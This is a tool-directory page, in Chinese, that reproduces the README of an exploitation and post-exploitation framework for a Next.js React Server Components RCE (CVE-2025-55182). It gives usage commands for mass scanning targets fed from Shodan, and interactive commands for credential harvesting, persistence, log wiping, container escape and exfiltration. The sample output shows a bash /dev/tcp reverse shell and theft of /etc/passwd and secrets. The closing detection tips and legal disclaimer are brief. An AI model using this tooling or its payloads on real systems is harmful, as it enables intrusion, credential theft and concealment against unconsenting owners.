Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/4nuxd/react2shell
渗透测试框架权限提升漏洞利用框架持久化机制横向移动Web应用程序漏洞利用数据泄露后渗透利用命令与控制容器逃逸
GitHub4nuxd/react2shell

React2Shell

439个月前尚未审核

R2S是一个全面的利用和后利用框架,针对Next.js React Server Components漏洞(CVE-2025-55182)。它提供具有高级功能的交互式shell,用于渗透测试,包括文件传输、持久化、枚举、权限提升检查等。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 R2S - Next.js RSC 漏洞利用框架

版本 Python 许可证 CVE

用于 Next.js React Server Components RCE 的高级后渗透利用框架

特性 • 安装 • 使用 • [命令](#-交互式 shell 命令) • 示例


📋 概述

R2S 是一个针对 Next.js React Server Components 漏洞(CVE-2025-55182)的综合性利用与后渗透利用框架。它提供了一个交互式 shell,具备高级功能,可用于渗透测试,包括文件传输、持久化、枚举、权限提升检测等。

🎯 关键能力

  • ✅ 自动化漏洞扫描 - 批量扫描多个目标
  • ✅ 交互式 RCE shell - 带目录导航的状态化命令执行
  • ✅ 基于 HTTP 的文件传输 - 上传/下载文件,无 base64 限制
  • ✅ 反向 shell 自动化 - 尝试 25+ 种不同的反向 shell 载荷
  • ✅ 高级枚举 - 系统、网络、容器和云元数据
  • ✅ 权限提升 - 自动检测提权向量
  • ✅ 凭据收集 - 提取密码、密钥、令牌和机密
  • ✅ 持久化机制 - 维持跨重启的访问权限
  • ✅ 横向移动 - 发现并跳转到其他主机
  • ✅ 容器逃逸 - 检查 Docker/Kubernetes 逃逸向量
  • ✅ 数据渗漏 - 提取敏感文件和配置
  • ✅ 隐秘操作 - 清除日志并隐藏痕迹

  • 🔥 特性

    🌐 核心利用

    • 批量扫描,支持多线程
    • 管道模式,用于与其他工具集成
    • 自动漏洞检测,针对 Next.js RSC
    • 状态化交互式 shell,保持工作目录

    📁 文件操作

    • 基于 HTTP 的上传 - 通过 wget/curl 将文件传输到目标
    • 基于 HTTP 的下载 - 通过 POST 请求渗漏文件
    • 无大小限制 - 适用于大文件(不像 base64 方法)
    • 自动 HTTP 服务器 - 按需启动/停止

    🔍 侦察与枚举

    • 系统枚举 - 操作系统、内核、用户、进程
    • 网络发现 - 接口、路由、ARP、DNS、监听端口
    • 容器检测 - Docker、Kubernetes、LXC 识别
    • 云元数据 - 提取 AWS、GCP、Azure 凭据
    • 进程内存转储 - 从运行进程提取机密
    • 有趣文件发现 - SUID、可写目录、备份、配置文件

    🔐 凭据收集

    • 环境变量(密码、API 密钥、令牌)
    • .env 文件和配置文件
    • SSH 私钥和 authorized_keys
    • 包含敏感命令的 Bash 历史
    • 数据库文件(SQLite、MySQL 转储)
    • 云凭据(AWS、Azure、GCP)
    • Git 凭据和 NPM 令牌
    • 浏览器数据(Cookie、登录数据)
    • Docker 和 Kubernetes 机密

    ⬆️ 权限提升

    • SUID/SGID 二进制文件检测
    • sudo 权限枚举
    • 可写系统文件(/etc/passwd、/etc/shadow)
    • Docker socket 访问检查
    • Linux 能力分析
    • 内核漏洞建议
    • Cron 作业枚举
    • PATH 劫持机会

    🔄 后渗透利用

    • 持久化机制 - Cron 作业、.bashrc、systemd 服务
    • 高级持久化 - LD_PRELOAD、systemd 定时器
    • 端口扫描 - 内部网络侦察
    • 横向移动 - SSH 密钥发现、known_hosts 分析
    • 容器逃逸 - 特权容器检查、能力分析
    • 数据渗漏 - 自动收集敏感数据
    • 反向 shell 自动化 - 25+ 载荷类型,自动重试

    🥷 隐秘与规避

    • 日志清理 - Bash 历史、auth 日志、syslog
    • 痕迹覆盖 - wtmp、lastlog 清理
    • 会话管理 - 保存和恢复会话

    🛠️ 安装

    前提条件

    root@kitploit:~
    # Python 3.6 或更高版本
    python3 --version
    
    # 安装依赖
    pip3 install requests urllib3
    

    快速开始

    root@kitploit:~
    # 克隆或下载工具
    cd r2s-main
    
    # 赋予可执行权限(可选)
    chmod +x r2s_enhanced.py
    
    # 运行工具
    python3 r2s_enhanced.py -h
    

    🚀 使用

    基本语法

    root@kitploit:~
    python3 r2s_enhanced.py [选项]
    

    命令行选项

    选项描述默认值
    -u, --url单个目标 URL-
    -l, --list包含 URL 列表的文件-
    -c, --cmd初始执行的命令id
    -t, --threads扫描线程数30
    -p, --proxyHTTP 代理(如 http://127.0.0.1:8080)-
    -v, --verbose启用详细输出False
    --http-port用于文件传输的 HTTP 服务器端口8000

    输入方式

    1. 单个目标

    root@kitploit:~
    python3 r2s_enhanced.py -u http://target.com
    

    2. 多个目标(文件)

    root@kitploit:~
    python3 r2s_enhanced.py -l targets.txt -t 50
    

    3. 管道模式(标准输入)

    root@kitploit:~
    cat targets.txt | python3 r2s_enhanced.py
    shodan search "Next.js" | python3 r2s_enhanced.py
    subfinder -d example.com | httpx | python3 r2s_enhanced.py
    

    💻 交互式 Shell 命令

    获得 RCE 访问权限后,你将进入一个交互式 shell,可使用以下命令:

    📂 文件传输

    root@kitploit:~
    upload <本地文件> <远程路径>      # 上传文件到目标
    download <远程文件> <本地路径>    # 从目标下载文件
    

    🧭 导航

    root@kitploit:~
    cd <目录>                         # 切换工作目录
    pwd                              # 显示当前工作目录
    

    🔍 枚举

    root@kitploit:~
    enum                             # 完整系统枚举
    privesc                          # 权限提升检查
    harvest                          # 凭据收集
    portscan <IP>                    # 扫描内部网络端口
    memdump [PID]                    # 转储进程内存以获取机密
    

    🎯 后渗透利用

    root@kitploit:~
    lateral                          # 横向移动机会
    escape                           # 容器逃逸向量
    exfil [类型]                     # 渗漏数据(env/config/keys/db/logs/all)
    reverse <lhost> <lport>          # 尝试多种反向 shell 载荷
    

    🔒 持久化

    root@kitploit:~
    persist                          # 添加基本持久化
    advpersist                       # 添加高级持久化
    

    🥷 隐秘

    root@kitploit:~
    stealth                          # 清除日志并隐藏痕迹
    

    💾 会话管理

    root@kitploit:~
    save                             # 保存当前会话
    help, ?                          # 显示帮助信息
    exit, quit                       # 退出交互式 shell
    

    🖥️ 系统命令

    直接执行任何 shell 命令:

    root@kitploit:~
    whoami
    id
    uname -a
    ps aux
    netstat -tulpn
    cat /etc/passwd
    

    📚 示例

    示例 1:基本利用

    root@kitploit:~
    $ python3 r2s_enhanced.py -u http://vulnerable-app.com
    
        _   __          __  ____            
       / | / /__  _  __/ /_/ __ \________   
      /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
     / /|  /  __/>  </_ _/ _, _/ /__/  __/  
    /_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   
    
       Next.js RSC 漏洞利用工具 (CVE-2025-55182)
       批量扫描器 & 管道版 (v4.1.0 - 增强版)
    
       >> 致谢 ( G4rxd )
    
    [*] 已加载 1 个目标。使用 30 个线程开始扫描...
    [*] 载荷命令: id
    
    [VULN] http://vulnerable-app.com >>> RCE 成功
           输出: uid=1000(node) gid=1000(node) groups=1000(node)
    
    [+] 状态化交互式 RCE shell 已启动。输入 'help' 查看命令。
    [*] 高级功能: enum, privesc, persist, portscan, harvest, stealth
    [*] 新功能: memdump, lateral, escape, exfil, advpersist, reverse
    
    [+] HTTP 服务器已在 192.168.1.100:8000 启动
    
    next-rce:/app$
    

    示例 2:系统枚举

    root@kitploit:~
    next-rce:/app$ enum
    
    [*] 开始自动枚举...
    
    ============================================================
    [*] 系统信息
    ============================================================
    Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    NAME="Ubuntu"
    VERSION="22.04.3 LTS (Jammy Jellyfish)"
    
    ============================================================
    [*] 当前用户
    ============================================================
    node
    uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
    
    ============================================================
    [*] 容器检测
    ============================================================
    12:devices:/docker/a1b2c3d4e5f6
    11:cpuset:/docker/a1b2c3d4e5f6
    [Docker 容器已检测到]
    
    ...
    

    示例 3:文件传输

    root@kitploit:~
    # 上传文件
    next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
    [*] 正在通过 HTTP 上传 /tmp/exploit.sh (2048 字节)...
    [+] 上传成功!
        -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
    
    # 下载文件
    next-rce:/app$ download /etc/passwd ./passwd.txt
    [*] 正在通过 HTTP 下载 /etc/passwd...
    [+] 下载成功! (1523 字节)
        已保存到: ./passwd.txt
    

    示例 4:凭据收集

    root@kitploit:~
    next-rce:/app$ harvest
    
    [*] 正在收集凭据...
    
    [*] 环境变量:
    DATABASE_PASSWORD=super_secret_pass
    API_KEY=sk-1234567890abcdef
    AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    
    [*] .env 文件:
    /app/.env
    /app/.env.production
    /var/www/.env.local
    
    [*] SSH 密钥:
    /home/node/.ssh/id_rsa
    /root/.ssh/id_rsa
    
    ...
    

    示例 5:反向 shell

    root@kitploit:~
    next-rce:/app$ reverse 192.168.1.100 4444
    
    [*] 开始向 192.168.1.100:4444 尝试反向 shell
    [!] 请确保你已运行监听器: nc -lvnp 4444
    
    [*] 正在尝试 25 种不同的反向 shell 载荷...
    
    [1/25] 尝试 Bash TCP... ✓ 已执行
    [?] 你收到连接了吗?(y/n/s 停止): y
    
    [+] 成功! 反向 shell 已建立,使用: Bash TCP
    [*] 载荷: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
    

    示例 6:批量扫描

    root@kitploit:~
    $ cat targets.txt
    http://app1.example.com
    http://app2.example.com
    http://app3.example.com
    
    $ python3 r2s_enhanced.py -l targets.txt -t 50
    
    [*] 已加载 3 个目标。使用 50 个线程开始扫描...
    
    [VULN] http://app1.example.com >>> RCE 成功
    [VULN] http://app3.example.com >>> RCE 成功
    
    [*] 扫描完成。
    

    示例 7:权限提升检查

    root@kitploit:~
    next-rce:/app$ privesc
    
    [*] 正在检查权限提升向量...
    
    [*] SUID 二进制文件:
    /usr/bin/sudo
    /usr/bin/passwd
    /usr/bin/mount
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    
    [*] sudo 权限:
    用户 node 可以运行以下命令:
        (ALL : ALL) NOPASSWD: /usr/bin/docker
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Docker 组:
    在 docker 组中 - 可被利用!
    
    ...
    

    示例 8:容器逃逸

    root@kitploit:~
    next-rce:/app$ escape
    
    [*] 正在检查容器逃逸向量...
    
    [*] 容器类型:
    12:devices:/docker/a1b2c3d4e5f6
    
    [*] 特权容器:
    PRIVILEGED
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] 能力:
    CapPrm: 0000003fffffffff
    CapEff: 0000003fffffffff
    [完全能力 - 容器具有特权]
    
    ...
    

    🔧 高级特性

    反向 Shell 载荷

    该工具包含 25+ 种反向 shell 载荷,涵盖多种语言和技术:

    • Bash(TCP、UDP、exec 变体)
    • Netcat(传统、mkfifo、OpenBSD)
    • Python/Python3(socket、pty)
    • Perl(多种变体)
    • PHP(exec、system、passthru)
    • Ruby(socket 变体)
    • Node.js(child_process、socket)
    • Socat、Telnet、AWK
    • Golang、OpenSSL

    云元数据提取

    自动检测并提取以下凭据:

    • AWS - IAM 角色、安全凭据
    • GCP - 服务账号令牌
    • Azure - 实例元数据
    • 包含云凭据的环境变量

    容器检测

    识别并分析:

    • Docker 容器
    • Kubernetes pods
    • LXC 容器
    • 特权 vs 非特权
    • 可用的逃逸向量

    ⚠️ 法律声明

    仅限教育和授权测试使用

    此工具仅供教育目的和授权渗透测试使用。未经事先双方同意而使用此工具攻击目标是非法的。作者不对因使用此工具而产生的任何滥用或损害负责。

    合法使用要求:

    • ✅ 目标所有者的书面授权
    • ✅ 明确的范围和交战规则
    • ✅ 专业渗透测试活动
    • ❌ 未经授权访问系统
    • ❌ 恶意意图或破坏

    🛡️ 检测与防御

    针对防御者

    检测:

    • 监控异常的 Next-Action 标头
    • 查找发送到不存在的端点的 multipart/form-data POST 请求
    • 检查错误响应中的 base64 编码的命令输出
    • 在 Next.js 日志中监控 child_process.execSync

    缓解措施:

    • 将 Next.js 更新到最新的修补版本
    • 实施 Web 应用防火墙(WAF)规则
    • 限制服务器端代码执行
    • 监控并记录所有 RSC 请求
    • 实施适当的输入验证

    📊 版本历史

    v4.1.0(当前) - 增强版

    • ✅ 添加了反向 shell 自动化(25+ 种载荷)
    • ✅ 添加了内存转储功能
    • ✅ 添加了横向移动发现
    • ✅ 添加了容器逃逸检查
    • ✅ 添加了数据渗漏自动化
    • ✅ 添加了高级持久化机制
    • ✅ 改进了 HTTP 文件传输
    • ✅ 增强了枚举功能
    • ✅ 更好的错误处理和用户体验

    v4.0.0 - 后渗透利用框架

    • ✅ 基于 HTTP 的文件传输
    • ✅ 持久化机制
    • ✅ 端口扫描器
    • ✅ 权限提升检查
    • ✅ 网络枚举
    • ✅ 凭据收集
    • ✅ 会话管理
    • ✅ 自动枚举
    • ✅ 隐秘功能

    v3.0.0 - 交互式 Shell

    • 带目录导航的状态化 shell
    • 基本文件传输(base64)
    • 改进了错误处理

    🤝 贡献

    欢迎贡献!请确保所有贡献均用于教育和防御性安全目的。


    👨‍💻 作者

    G4rxd


    🙏 致谢

    • CVE-2025-55182 发现团队
    • Next.js 安全研究社区
    • 开源安全工具社区

    📄 许可证

    本项目仅许可用于教育和授权测试目的。


    ⚡ 祝道德黑客快乐!⚡

    记住:能力越大,责任越大。

    下载工具